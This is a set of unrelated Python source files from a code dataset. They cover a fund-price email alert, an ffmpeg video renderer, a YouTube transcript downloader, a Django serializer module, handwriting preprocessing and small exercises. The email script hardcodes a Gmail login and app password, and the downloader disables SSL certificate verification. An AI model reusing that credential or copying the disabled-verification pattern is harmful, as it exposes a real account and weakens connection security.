((df['cotacao'].iloc[len(df['cotacao']) - 1]) - min(df['cotacao']))/min(df['cotacao'])\n\n wind = 0.2 # valor para janela de oportunidade\n\n if var > wind:\n\n sender_email = \"emailautomatico11@gmail.com\" # Enter your address\n receiver_email = \"lucasoliveira5978@gmail.com\" # Enter receiver address\n password = \"nucxkwaaqoazgnxh\"\n message = MIMEMultipart(\"alternative\")\n message[\"Subject\"] = f\"!Oportunidade de venda de FII {empresa}\"\n message[\"From\"] = sender_email\n message[\"To\"] = receiver_email\n\n # Create the plain-text and HTML version of your message\n msg = \"\"\"\\\n Há uma janela de oportunidade de venda para {0}.\n O fundo subiu mais de {1} % nos últimos {2} meses\n \"\"\"\n\n text = msg.format(empresa, round(min(df[\"Adj Close\"]), 2), str(verMinDate(dates,vals))[0:10],\n round(df[\"Adj Close\"][len(df[\"Adj Close\"])-1], 2), round(var*100,2))\n\n msg = \"\"\"\\\n \n \n

Há uma janela de oportunidade de venda para:\n {0}\n O fundo estava cotado no valor de R$ {1} no dia {2},\n hoje está cotado no valor de R$ {3},\n Uma subida de {4} %
\n \n \n \"\"\"\n\n html = msg.format(empresa, round(max(df[\"cotacao\"]), 2), str(verMinDate(df['data'], df['cotacao']))[0:10],\n round(df[\"cotacao\"].iloc[len(df[\"cotacao\"])-1], 2), round(-var*100,2))\n\n # Turn these into plain/html MIMEText objects\n part1 = MIMEText(text, \"plain\")\n part2 = MIMEText(html, \"html\")\n\n # Add HTML/plain-text parts to MIMEMultipart message\n # The email client will try to render the last part first\n message.attach(part1)\n message.attach(part2)\n\n # Create secure connection with server and send email\n context = ssl.create_default_context()\n with smtplib.SMTP_SSL(\"smtp.gmail.com\", 465, context=context) as server:\n server.login(sender_email, password)\n server.sendmail(\n sender_email, receiver_email, message.as_string().encode('utf-8')\n )\n else:\n msg = \"Empresa {} analisado. Sem oportunidade\"\n print(msg.format(empresa))\n\n","repo_name":"Lucas-Oliveira-wd/fii_data","sub_path":"lkng_for_sell_fii.py","file_name":"lkng_for_sell_fii.py","file_ext":"py","file_size_in_byte":5040,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3743016219","text":"from pyqtgraph.Qt import QtCore, QtGui\nimport pyqtgraph.opengl as gl\nimport numpy as np\nimport sys\nimport time\nimport signal\nimport subprocess\nimport pyqtgraph as pg\nimport pyqtgraph.exporters\nfrom pyqtgraph import functions as fn\nimport io\n\ncanvas_width, canvas_height = 1920, 1080\n# canvas_width, canvas_height = 1920 * 2, 1080 * 2\n\nshape = canvas_width, canvas_height\n\noutf = 'tmp.mp4'\n\ncmd = ('ffmpeg',\n '-loglevel', 'trace',\n '-hwaccel', 'videotoolbox', \n # '-threads', '16',\n '-y', '-r', '60', # overwrite, 60fps\n '-s', f'{canvas_width}x{canvas_height}', # size of image string\n '-pix_fmt', 'argb', # format\n # '-pix_fmt', 'videotoolbox_vld', # format\n # '-pix_fmt', 'yuv420p', # format\n # '-f', 'rawvideo',\n '-i', '-', # tell ffmpeg to expect raw video from the pipe\n # '-c:v', 'hevc_videotoolbox', '-pix_fmt', 'yuv420p', '-tag:v', 'hvc1', '-profile:v', 'main10', '-b:v', '10M', '-an', '-sn',\n '-c:v', 'hevc_videotoolbox', '-pix_fmt', 'yuv420p', '-tag:v', 'hvc1', '-profile:v', 'main10',\n '-b:v', '16M',\n # '-c:v', 'h264_videotoolbox', '-pix_fmt', 'yuv420p', '-b:v', '5M',\n # '-c:v', 'h264_videotoolbox', '-b:v', '1M', '-an', '-sn', \n # '-pix_fmt', 'videotoolbox_vld', # format\n\n \n outf)\n # '-c:v', 'hevc_videotoolbox', '-profile:v', 'main10', '-tag:v', 'hvc1', '-b:v', '1M', '-an', '-sn', outf)\n # '-c:v', 'libx265', '-tag:v', 'hvc1', '-b:v', '1M', '-an', '-sn', outf)\n\n # '-vcodec', 'h264_videotoolbox', '-profile:v', 'high', outf) # output encoding\n\n# ffmpeg -i [input_file] -c:v hevc_videotoolbox -profile:v main10 -tag:v hvc1 -b:v 10000k -an -sn output_filename.mp4\n# [format @ 0x7ff5caf04b40] Setting 'pix_fmts' to value 'videotoolbox_vld|nv12|yuv420p|p010le'\np = subprocess.Popen(cmd, stdin=subprocess.PIPE)\n\n\n# ib = io.BytesIO()\n\n# -vcodec hevc_videotoolbox\nprint('f')\nclass Visualizer(QtGui.QWidget):\n def __init__(self):\n super().__init__()\n\n # pg.setConfigOption('background', 'w')\n # pg.setConfigOption('foreground', 'k')\n\n self.layout = QtGui.QVBoxLayout()\n\n # self.app = QtGui.QApplication(sys.argv)\n\n\n self.glayout = pg.GraphicsLayoutWidget()\n self.view = self.glayout.addViewBox(lockAspect=False)\n # self.view = self.glayout.addViewBox(lockAspect=True)\n self.img = pg.ImageItem(border='w')\n self.view.addItem(self.img)\n # bipolar colormap\n pos = np.array([0., 1., 0.5, 0.25, 0.75])\n 
color = np.array([[0,255,255,255], [255,255,0,255], [0,0,0,255], [0, 0, 255, 255], [255, 0, 0, 255]], dtype=np.ubyte)\n cmap = pg.ColorMap(pos, color)\n lut = cmap.getLookupTable(0.0, 1.0, 256)\n # set colormap\n self.img.setLookupTable(lut)\n # self.img.setLevels([-140, -50])\n self.img.setLevels([-50, 20])\n self.layout.addWidget(self.glayout)\n\n self.setLayout(self.layout)\n self.setGeometry(10, 10, 500, 500)\n \n self.show() \n self.hide()\n # self.close()\n\n\n self.update()\n\n\n def start(self):\n if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n QtGui.QApplication.instance().exec_()\n\n\n\n def update(self):\n print('lol')\n for frame in range(300):\n\n self.img.setImage(np.random.random((canvas_width, canvas_height)), autoLevels=True)\n exporter = pg.exporters.ImageExporter(self.view)\n\n exporter.params.param('width').setValue(canvas_width, blockSignal=exporter.widthChanged)\n exporter.params.param('height').setValue(canvas_height, blockSignal=exporter.heightChanged)\n\n im = exporter.export(toBytes=True)\n\n buffer = QtCore.QBuffer()\n buffer.open(QtCore.QIODevice.WriteOnly)\n # buffer.open(QtCore.QIODevice.ReadWrite)\n im.save(buffer, 'PNG')\n b = buffer.data()\n # print(b)\n\n # print(hasattr(z, 'data'))\n # print(z.pixelFormat().yuvLayout())\n # print(z.bits())\n # b = z.data.tobytes()\n # z.save(p.stdin, 'PNG')\n p.stdin.write(b)\n # ib.write(b)\n\n\n\n p.communicate()\n\n\n\n# Start Qt event loop unless running in interactive mode.\nif __name__ == '__main__':\n app = QtGui.QApplication(sys.argv)\n gui = Visualizer()\n gui.show()\n app.exec()\n signal.signal(signal.SIGINT, signal.SIG_DFL)\n","repo_name":"tandav/spectrogram","sub_path":"pyqtgraph_video/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"70510375305","text":"import csv\nimport re\nimport os\nimport json\nimport yt_dlp\nimport whisper\nfrom tqdm import tqdm\nimport ssl\nimport threading\nfrom queue import Queue\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n# Folder to save audio and transcripts\naudio_folder = 'audio_files'\ntranscripts_folder = 'transcripts2'\n\n# Queue for processing videos\nvideo_queue = Queue()\n\n\ndef sanitize_filename(filename):\n \"\"\"\n Removes invalid characters from filename and truncates it if it's too long.\n \"\"\"\n s = re.sub(r'[\\\\/*?:\"<>|]', '', filename)\n if len(s) > 200:\n s = s[:200]\n return s\n\n\ndef download_audio_and_get_title(video_id, ydl):\n audio_file_path = f'{audio_folder}/{video_id}.mp3'\n title = None\n info_dict = ydl.extract_info(\n f'https://www.youtube.com/watch?v={video_id}', download=False)\n title = sanitize_filename(info_dict.get('title', video_id))\n\n transcript_file = f\"{transcripts_folder}/{title}.txt\"\n # Check if either the audio file or the transcript file already exists\n if not os.path.exists(audio_file_path) and not os.path.exists(transcript_file):\n ydl.download([f'https://www.youtube.com/watch?v={video_id}'])\n else:\n print(f\"Skipping {video_id} as audio or transcript already exists.\")\n title = None # Set title to None to indicate skipping\n\n return title\n\n\ndef transcribe_audio_with_whisper(audio_file):\n model = whisper.load_model(\"small\")\n result = model.transcribe(audio_file)\n return result[\"text\"]\n\n\ndef process_video(video_id, video_url, ydl):\n title = download_audio_and_get_title(video_id, ydl)\n if title:\n # Change the extension to 
.json\n transcript_file = f\"{transcripts_folder}/{title}.json\"\n audio_file = f\"{audio_folder}/{video_id}.mp3\"\n transcript_text = transcribe_audio_with_whisper(audio_file)\n\n # Include the video URL in the transcript data\n transcript_data = {\n \"url\": video_url,\n \"title\": title,\n \"transcript\": transcript_text\n }\n\n with open(transcript_file, 'w', encoding=\"utf-8\") as outfile:\n json.dump(transcript_data, outfile, ensure_ascii=False,\n indent=4) # Write as formatted JSON\n else:\n print(f\"Skipped processing for {video_id}.\")\n\n\ndef worker(ydl):\n while True:\n video_id, video_url = video_queue.get()\n process_video(video_id, video_url, ydl)\n video_queue.task_done()\n\n\ndef download_transcripts_from_csv(file_path, ydl):\n with open(file_path, 'r') as csvfile:\n reader = csv.reader(csvfile)\n for row in tqdm(reader):\n url = row[0]\n if \"list=\" in url:\n try:\n info_dict = ydl.extract_info(url, download=False)\n if 'entries' in info_dict:\n for video in info_dict['entries']:\n if video:\n video_url = video.get('webpage_url')\n video_queue.put((video['id'], video_url))\n else:\n print(f\"No entries found for playlist: {url}\")\n except Exception as e:\n print(f\"Error extracting playlist information: {e}\")\n else:\n video_id = url.split('v=')[-1]\n video_queue.put((video_id, url))\n\n\nif __name__ == \"__main__\":\n os.makedirs(audio_folder, exist_ok=True)\n os.makedirs(transcripts_folder, exist_ok=True)\n\n ydl_opts = {\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n 'outtmpl': f'{audio_folder}/%(id)s.%(ext)s',\n 'ignoreerrors': True,\n 'extract_flat': True,\n }\n\n ydl = yt_dlp.YoutubeDL(ydl_opts)\n\n # Create and start worker threads\n for i in range(4):\n t = threading.Thread(target=worker, args=(ydl,))\n t.daemon = True\n t.start()\n\n csv_path = 'urls.csv'\n download_transcripts_from_csv(csv_path, ydl)\n\n video_queue.join()","repo_name":"njwright92/comicBot","sub_path":"transcript_downloader.py","file_name":"transcript_downloader.py","file_ext":"py","file_size_in_byte":4144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39446277845","text":"def find(s):\n s1 = []\n s1_c = 0\n s2 = []\n s2_c = 0\n for i, ch in enumerate(s):\n if ch == \"(\":\n s1.append(ch)\n elif ch == \")\":\n if len(s1) > 0:\n s1.pop()\n s1_c += 1\n elif ch == \"[\":\n s2.append(ch)\n elif ch == \"]\":\n if len(s2) > 0:\n s2.pop()\n s2_c += 1\n return s1_c + s2_c\n\n\ndef main():\n t = int(input())\n\n while --t:\n s = input()\n\n print(find(s))\n\n\ndef test():\n print(find(\")([)]\"))\n\n\nmain()\n","repo_name":"alexro/pypypy","sub_path":"code_forces/1452C.py","file_name":"1452C.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4260260092","text":"from functools import partial\nfrom uuid import UUID\n\nfrom dateutil.parser import parse as dateutil_parse\nfrom django.apps import apps\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom rest_framework import serializers\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.fields import ReadOnlyField, UUIDField\n\nfrom datahub.core.constants import Country as CountryEnum\nfrom datahub.core.validate_utils import DataCombiner\nfrom datahub.core.validators import InRule, OperatorRule, RulesBasedValidator, 
ValidationRule\nfrom datahub.metadata.models import AdministrativeArea, Country\n\nMAX_LENGTH = settings.CHAR_FIELD_MAX_LENGTH\n\n\nclass ConstantModelSerializer(serializers.Serializer):\n \"\"\"Constant models serializer.\"\"\"\n\n id = serializers.ReadOnlyField()\n name = serializers.ReadOnlyField()\n disabled_on = serializers.ReadOnlyField()\n\n\nclass PermittedFieldsModelSerializer(serializers.ModelSerializer):\n \"\"\"Lets you get permitted fields only.\n\n Needs 'permissions' attribute on Meta class in following format:\n permissions = {\n 'app_name.permission': 'field'\n }\n\n If user doesn't have required permission, corresponding field will be filtered out.\n\n Note: The current implementation does not allow access to the field if request.user is None.\n \"\"\"\n\n def get_fields(self):\n \"\"\"Gets filtered dictionary of fields based on permissions.\"\"\"\n assert hasattr(self.Meta, 'permissions'), (\n 'Class {serializer_class} missing \"Meta.permissions\" attribute'.format(\n serializer_class=self.__class__.__name__,\n )\n )\n\n fields = super().get_fields()\n request = self.context.get('request', None)\n\n if request:\n permissions = self.Meta.permissions\n for permission, field in permissions.items():\n if not request.user or not request.user.has_perm(permission):\n del fields[field]\n return fields\n\n\nclass NestedRelatedField(serializers.RelatedField):\n \"\"\"DRF serialiser field for foreign keys and many-to-many fields.\n\n Serialises as a dict with 'id' plus other specified keys.\n \"\"\"\n\n default_error_messages = {\n 'required': 'This field is required.',\n 'missing_pk': 'pk not provided.',\n 'does_not_exist': 'Invalid pk \"{pk_value}\" - object does not exist.',\n 'incorrect_type': 'Incorrect type. Expected object, received {'\n 'data_type}.',\n }\n\n def __init__(self, model, extra_fields=('name',), **kwargs):\n \"\"\"Initialises the related field.\n\n :param model: Model of the related field.\n :param extra_fields: List of extra fields to include in the representation.\n Can contain field names as strings or as tuples of\n (field name, DRF field).\n E.g. 
['field1', ('field2', CharField())]\n :param kwargs: Keyword arguments to pass to\n RelatedField.__init__()\n \"\"\"\n super().__init__(**kwargs)\n\n model_class = (apps.get_model(model) if isinstance(model, str) else\n model)\n\n self.pk_field = UUIDField()\n self._fields = [\n field if isinstance(field, tuple) else (field, ReadOnlyField())\n for field in extra_fields\n ]\n self._model = model_class\n\n def get_queryset(self):\n \"\"\"Returns the queryset corresponding to the model.\"\"\"\n return self._model.objects.all()\n\n def to_internal_value(self, data):\n \"\"\"Converts a user-provided value to a model instance.\"\"\"\n try:\n if isinstance(data, (str, UUID)):\n id_repr = data\n else:\n id_repr = data['id']\n data = self.pk_field.to_internal_value(id_repr)\n return self.get_queryset().get(pk=data)\n except ObjectDoesNotExist:\n self.fail('does_not_exist', pk_value=data)\n except KeyError:\n self.fail('missing_pk')\n except (TypeError, ValueError):\n self.fail('incorrect_type', data_type=type(data).__name__)\n\n def to_representation(self, value):\n \"\"\"Converts a model instance to a dict representation.\"\"\"\n if not value:\n return value\n\n extra = {\n field_name: field.to_representation(getattr(value, field_name))\n for field_name, field in self._fields\n }\n return {\n **extra,\n 'id': self.pk_field.to_representation(value.pk),\n }\n\n def get_choices(self, cutoff=None):\n \"\"\"Returns choices for DRF UI.\n\n Standard implementation uses a dict, but that doesn't work as our\n representation isn't hashable.\n \"\"\"\n queryset = self.get_queryset()\n if queryset is None:\n return ()\n\n if cutoff is not None:\n queryset = queryset[:cutoff]\n\n return _Choices(\n (\n self.pk_field.to_representation(item.pk),\n self.display_value(item),\n )\n for item in queryset\n )\n\n\nRelaxedDateField = partial(serializers.DateField, input_formats=('iso-8601', '%Y/%m/%d'))\n\n\nclass RelaxedDateTimeField(serializers.Field):\n \"\"\"\n Relaxed DateTime field.\n\n Front end uses free text field for data filters, that's why\n we need to accept date/datetime in various different formats.\n DRF DateTimeField doesn't offer that flexibility.\n \"\"\"\n\n default_error_messages = {\n 'invalid': 'Date is in incorrect format.',\n }\n\n def to_internal_value(self, data):\n \"\"\"Parses data into datetime.\"\"\"\n try:\n data = dateutil_parse(data)\n except ValueError:\n self.fail('invalid', value=data)\n return data\n\n def to_representation(self, value):\n \"\"\"Formats the datetime using a normal DateTimeField.\"\"\"\n repr_field = serializers.DateTimeField()\n return repr_field.to_representation(value)\n\n\nclass RelaxedURLField(serializers.URLField):\n \"\"\"URLField subclass that prepends http:// to input and output when a scheme is not present.\"\"\"\n\n def to_internal_value(self, data):\n \"\"\"Converts a user-provided value to an internal value.\"\"\"\n return super().to_internal_value(self._fix_missing_url_scheme(data))\n\n def to_representation(self, value):\n \"\"\"Converts a stored value to the external representation.\"\"\"\n return super().to_representation(self._fix_missing_url_scheme(value))\n\n @staticmethod\n def _fix_missing_url_scheme(value):\n if value and '://' not in value:\n return f'http://{value}'\n return value\n\n\nclass _Choices:\n \"\"\"Wrapper for choices to make them compatible with DRF.\"\"\"\n\n def __init__(self, choices):\n self._choices = choices\n\n def items(self):\n \"\"\"Returns the choices.\"\"\"\n return self._choices\n\n\nclass 
AddressSerializer(serializers.ModelSerializer):\n \"\"\"\n ModelSerializer that can be used to simulate nested address objects.\n\n E.g.\n\n Model:\n class MultiAddressModel(models.Model):\n primary_address_1 = models.CharField(max_length=MAX_LENGTH)\n primary_address_2 = models.CharField(max_length=MAX_LENGTH, blank=True)\n primary_address_town = models.CharField(max_length=MAX_LENGTH)\n primary_address_county = models.CharField(max_length=MAX_LENGTH, blank=True)\n primary_address_country = models.ForeignKey(\n Country, on_delete=models.PROTECT, related_name='+',\n )\n primary_address_postcode = models.CharField(max_length=MAX_LENGTH, blank=True)\n\n secondary_address_1 = models.CharField(max_length=MAX_LENGTH, blank=True)\n secondary_address_2 = models.CharField(max_length=MAX_LENGTH, blank=True, null=True)\n secondary_address_town = models.CharField(max_length=MAX_LENGTH, blank=True)\n secondary_address_county = models.CharField(max_length=MAX_LENGTH, blank=True)\n secondary_address_country = models.ForeignKey(\n Country, null=True, on_delete=models.SET_NULL, related_name='+',\n )\n secondary_address_postcode = models.CharField(max_length=MAX_LENGTH, blank=True)\n\n Serializer:\n class MultiAddressModelSerializer(serializers.ModelSerializer):\n primary_address = AddressSerializer(\n source_model=MultiAddressModel,\n address_source_prefix='primary_address',\n )\n secondary_address = AddressSerializer(\n source_model=MultiAddressModel,\n address_source_prefix='secondary_address',\n required=False,\n allow_null=True,\n )\n\n class Meta:\n model = MultiAddressModel\n fields = ['primary_address', 'secondary_address']\n\n Will produce the following API response:\n {\n 'primary_address': {\n 'line_1': '2',\n 'line_2': '',\n 'town': 'London',\n 'county': '',\n 'postcode': '',\n 'country': {\n 'id': '80756b9a-5d95-e211-a939-e4115bead28a',\n 'name': 'United Kingdom',\n },\n },\n 'secondary_address': {\n 'line_1': '1',\n 'line_2': '',\n 'town': 'Muckamore',\n 'county': '',\n 'postcode': '',\n 'country': {\n 'id': '736a9ab2-5d95-e211-a939-e4115bead28a',\n 'name': 'Ireland',\n },\n },\n },\n\n Please note:\n 1. None values for CharFields will be converted to ''\n 2. If all address field values are blank the nested object in the response will return None\n\n E.g. Fiven the following fields' values:\n secondary_address_1=''\n secondary_address_2=''\n secondary_address_town=''\n secondary_address_county=''\n secondary_address_postcode=''\n secondary_address_country_id=None\n\n The equivalent API response body will be:\n 'secondary_address': None\n\n The same applies for changing the data.\n 3. 
If AddressSerializer has required=False, the validation is triggered only if at least\n one of the fields is passed in.\n \"\"\"\n\n line_1 = serializers.CharField(\n max_length=MAX_LENGTH,\n allow_blank=True,\n required=False,\n default='',\n source='{source_prefix}_1',\n )\n line_2 = serializers.CharField(\n max_length=MAX_LENGTH,\n allow_blank=True,\n required=False,\n default='',\n source='{source_prefix}_2',\n )\n town = serializers.CharField(\n max_length=MAX_LENGTH,\n allow_blank=True,\n required=False,\n default='',\n source='{source_prefix}_town',\n )\n county = serializers.CharField(\n max_length=MAX_LENGTH,\n allow_blank=True,\n required=False,\n default='',\n source='{source_prefix}_county',\n )\n postcode = serializers.CharField(\n max_length=MAX_LENGTH,\n allow_blank=True,\n required=False,\n default='',\n source='{source_prefix}_postcode',\n )\n area = NestedRelatedField(\n AdministrativeArea,\n allow_null=True,\n required=False,\n source='{source_prefix}_area',\n )\n country = NestedRelatedField(\n Country,\n allow_null=True,\n required=False,\n source='{source_prefix}_country',\n )\n\n REQUIRED_FIELDS = (\n 'line_1',\n 'town',\n 'country',\n )\n\n def __init__(\n self, source_model, *args,\n address_source_prefix='address', area_can_be_required=False,\n postcode_can_be_required=False, **kwargs,\n ):\n \"\"\"\n Initialises the serializer.\n\n It populates all necessary parts (e.g. Meta model, source, fields' source).\n \"\"\"\n # Define a custom Meta so that the Meta model can be specified as an argument\n class MultiAddressMeta(self.Meta):\n model = source_model\n self.Meta = MultiAddressMeta\n\n kwargs.setdefault('source', '*')\n\n super().__init__(*args, **kwargs)\n\n # populate fields' source\n for field in self.fields.values():\n field.source = field.source.format(source_prefix=address_source_prefix)\n field.source_attrs = field.source.split('.')\n\n self.area_can_be_required = area_can_be_required\n self.postcode_can_be_required = postcode_can_be_required\n self.address_source_prefix = address_source_prefix\n\n def add_area_validator(self, validators):\n \"\"\"\n Mark area as required for US and Canadian companies.\n \"\"\"\n validators.append(\n RulesBasedValidator(\n ValidationRule(\n 'required',\n OperatorRule(f'{self.address_source_prefix}_area', bool),\n when=InRule(\n f'{self.address_source_prefix}_country',\n (\n CountryEnum.united_states.value.id,\n CountryEnum.canada.value.id,\n ),\n ),\n ),\n ),\n )\n\n def add_postcode_validator(self, validators):\n \"\"\"\n Mark postcode as required for US and Canadian companies.\n \"\"\"\n validators.append(\n RulesBasedValidator(\n ValidationRule(\n 'required',\n OperatorRule(f'{self.address_source_prefix}_postcode', bool),\n when=InRule(\n f'{self.address_source_prefix}_country',\n (\n CountryEnum.united_states.value.id,\n CountryEnum.canada.value.id,\n ),\n ),\n ),\n ),\n )\n\n def get_validators(self):\n \"\"\"\n Append ValidationRule for area/postcode depending on feature flag/context\n\n Only mark area/postcode required if country is US/Canada & called from context where area\n is safe to require, and if feature flag enabled. 
Currently the only context where area is\n safe to require is CompanySerializer\n \"\"\"\n validators = super().get_validators()\n\n if self.area_can_be_required:\n self.add_area_validator(validators)\n\n if self.postcode_can_be_required:\n self.add_postcode_validator(validators)\n\n return validators\n\n def run_validation(self, data=serializers.empty):\n \"\"\"\n Converts None to dict with default values so that those values can be used to\n reset the fields on the model.\n \"\"\"\n if data or not self.allow_null:\n normalised_data = data\n else:\n normalised_data = {\n field_name: None if (field.default == serializers.empty) else field.default\n for field_name, field in self.fields.items()\n }\n return super().run_validation(data=normalised_data)\n\n def to_representation(self, value):\n \"\"\"\n It returns None if none of the address values is set.\n E.g.\n {\n 'address': None\n }\n instead of\n {\n 'address': {\n 'line_1': '',\n 'line_2': '',\n 'town': '',\n 'county': '',\n 'postcode': '',\n 'country': None\n }\n }\n \"\"\"\n address_dict = super().to_representation(value)\n if not any(address_dict.values()):\n return None\n\n # for each address field, replace None with default if possible\n for field_name, value in address_dict.items():\n field_default = self.fields[field_name].default\n\n if value is None and field_default is not serializers.empty:\n address_dict[field_name] = field_default\n\n return address_dict\n\n def should_validate(self, data_combiner):\n \"\"\"\n Returns true if the data should be validated.\n \"\"\"\n if self.required:\n return True\n\n return any(\n data_combiner.get_value(field.source)\n for field in self.fields.values()\n )\n\n def validate(self, attrs):\n \"\"\"\n Validates the data if necessary.\n This is needed because some addresses only need to be validated\n if they are passed in.\n \"\"\"\n validated_data = super().validate(attrs)\n\n data_combiner = DataCombiner(self.parent.instance, validated_data)\n if self.should_validate(data_combiner):\n errors = {}\n for field_name in self.REQUIRED_FIELDS:\n field = self.fields[field_name]\n value = data_combiner.get_value(field.source)\n if not value:\n errors[field_name] = self.error_messages['required']\n\n if errors:\n raise ValidationError(errors)\n\n return validated_data\n\n class Meta:\n \"\"\"Meta options.\"\"\"\n\n model = None\n fields = (\n 'line_1',\n 'line_2',\n 'town',\n 'county',\n 'postcode',\n 'area',\n 'country',\n )\n","repo_name":"uktrade/data-hub-api","sub_path":"datahub/core/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":17672,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"81"} +{"seq_id":"31670152278","text":"import numpy as np\nimport cv2\nimport operator\n\n\ndef extract_hand_written(gray):\n \"\"\"\n This function returns original cropped image and dilated cropped image \n for the handwritten part only and exclude any unused parts.\n \"\"\"\n # Apply binary thresholding using otsu's method to inverse the background and content color.\n thresh_inv = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]\n\n # Apply noise removal.\n blur = cv2.GaussianBlur(thresh_inv, (3, 3), 0)\n\n # Apply thresholding for better and more general output.\n binary = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1]\n\n # Apply dilation to the image to make sure that horizontal lines are continuous.\n # Taking a matrix of size 4,2 as the kernel\n kernel = np.ones((4, 1), np.uint8)\n 
img_dilation = cv2.dilate(binary, kernel, iterations=3)\n\n # Find lines by using contour\n # Find contours\n contours, hierarchy = cv2.findContours(img_dilation,\n cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\n # Find bounded rectangles surround the contours\n bounding_rectangles = [None] * len(contours)\n for i in range(len(contours)):\n bounding_rectangles[i] = cv2.boundingRect(contours[i])\n\n # Sort bounding rectangles descendingly according to width\n bounding_rectangles.sort(key=operator.itemgetter(2), reverse=True)\n\n lines = [] # store the three horizontal lines\n for i in range(len(bounding_rectangles)):\n append = True\n for j in range(len(lines)):\n if abs(bounding_rectangles[i][1] - lines[j][1]) < 100:\n append = False\n if append:\n lines.append(bounding_rectangles[i])\n if len(lines) > 2:\n break\n\n lines.sort(key=operator.itemgetter(1)) # sort lines ascendingly according to height\n\n first_crop_line_height = lines[1][1] + lines[1][3]\n second_crop_line_height = lines[2][1]\n\n # Crop the original image and the dilated image\n segmented_image = img_dilation[first_crop_line_height + 10:second_crop_line_height - 10, :]\n segmented_image_original = gray[first_crop_line_height + 10:second_crop_line_height - 10, :]\n return segmented_image, segmented_image_original\n\n\ndef detect_sentences(segmented_image, segmented_image_original):\n \"\"\"\n This function detect sentences and return a list of detected sentences.\n \"\"\"\n # Apply erosion to remove noise.\n kernel = np.ones((3, 5), np.uint8)\n img_erosion = cv2.erode(segmented_image, kernel, iterations=3)\n\n # Apply dilation to connect sentence together as one block\n # Taking a matrix of size 3,10 as the kernel \n kernel = np.ones((2, 25), np.uint8)\n img_dilation = cv2.dilate(img_erosion, kernel, iterations=11)\n\n # Find contours\n contours, hierarchy = cv2.findContours(img_dilation, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n # Find bounded rectangles surround the contours\n bounding_rectangles = [None] * len(contours)\n for i in range(len(contours)):\n bounding_rectangles[i] = cv2.boundingRect(contours[i])\n\n sentences = []\n # Loop on the contours and crop each sentence\n i = len(contours) - 1\n while i >= 0:\n difference_in_width = bounding_rectangles[i][2]\n difference_in_height = bounding_rectangles[i][3]\n if difference_in_width > 600 and difference_in_height > 50:\n initial_height = int(bounding_rectangles[i][1]) - 20\n if initial_height < 0:\n initial_height = 0\n seg_sentence = np.copy(segmented_image_original[initial_height:int(bounding_rectangles[i][1])\n + difference_in_height,\n int(bounding_rectangles[i][0]) + 50:int(bounding_rectangles[i][0])\n + difference_in_width - 50])\n sentences.append(seg_sentence)\n i -= 1\n return sentences\n\n\ndef preprocessing(img):\n \"\"\"\n This function pre-process the image and return list of sentences.\n \"\"\"\n # Extract hand written part\n segmented_image, segmented_image_original = extract_hand_written(img)\n # Apply noise removal.\n segmented_image_original = cv2.GaussianBlur(segmented_image_original, (3, 3), 0)\n # Extract sentences\n sentences = detect_sentences(segmented_image, segmented_image_original)\n return sentences\n","repo_name":"shadyfahmy/writer-identification-system","sub_path":"source/preprocessing/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7569745568","text":"#kharbozeeeeeeeeeeeee\nfrom tkinter 
import *\nimport tkinter.messagebox\nfrom tkinter import messagebox\nimport tkinter.font as font\n\nroot=Tk()\n\nroot.geometry('500x500')\nroot.resizable(True,True)\nroot.title(\"suduku!!!\")\n\nent=[]\n\nfor i in range(1,10):\n for j in range (1,10):\n ent.append(Entry(root, width=4))\n ent[len(ent)-1].grid(row=i, column=j)\n\n\ninp=[]\n\ndef catcher():\n for i in range(9):\n for j in range (9):\n inp.append(ent[i*9+j].get())\n\n\n\ndef block_check():\n catcher()\n\n\nbuttonFont = font.Font(family='Helvetica', size=10, weight='bold')\nbtn_submit = Button(root, text = 'Finish',font=buttonFont, fg = \"red\", bg = 'brown', width=30, command=block_check())\nbtn_submit.grid(row = 10, column = 1, columnspan=9)\n\nroot.mainloop()\n\n##from tkinter import *\n##from tkinter import messagebox\n##\n##root = Tk()\n##root.title('suduko.game')\n##window = grid(root,row = 8,column = 4,padx = 20,pady = 30)\n##def change_frame(frame):\n## frame.tkraise()\n##\n##suduco_page = Frame(root)\n##menu_page = Frame(root)\n##\n###in label zir fake\n##\n##hello = Label(root,fg = 'black')\n##hello.grid(row = 1,column = 1)\n##\n##for frame in (suduco_page, menu_page):\n## frame.grid(heghth = 6,wgheit = 7, sticky='news')\n## \n##\n##easy = Button(menu_page,padx = 30,pady = 12, text='easy', command = lambda:change_frame(suduco_page))\n##easy.grid(row = 3,column = 6)\n##\n##normal = Button(menu_page,padx = 30,pady = 12, text='normal', command = lambda:change_frame(suduco_page))\n##normal.grid(row = 1,column = 1)\n##\n##hard = Button(menu_page,padx = 30,pady = 12, text='hard', command = lambda:change_frame(suduco_page))\n##hard.grid(row = 2,column = 2)\n##\n###\n##Button(suduco_page, text='<- back', command = lambda:change_frame(menu_page))\n\n","repo_name":"mosacode/suduku","sub_path":"suduko.py","file_name":"suduko.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24080502890","text":"def solution(land, P, Q):\n lst = []\n for i in 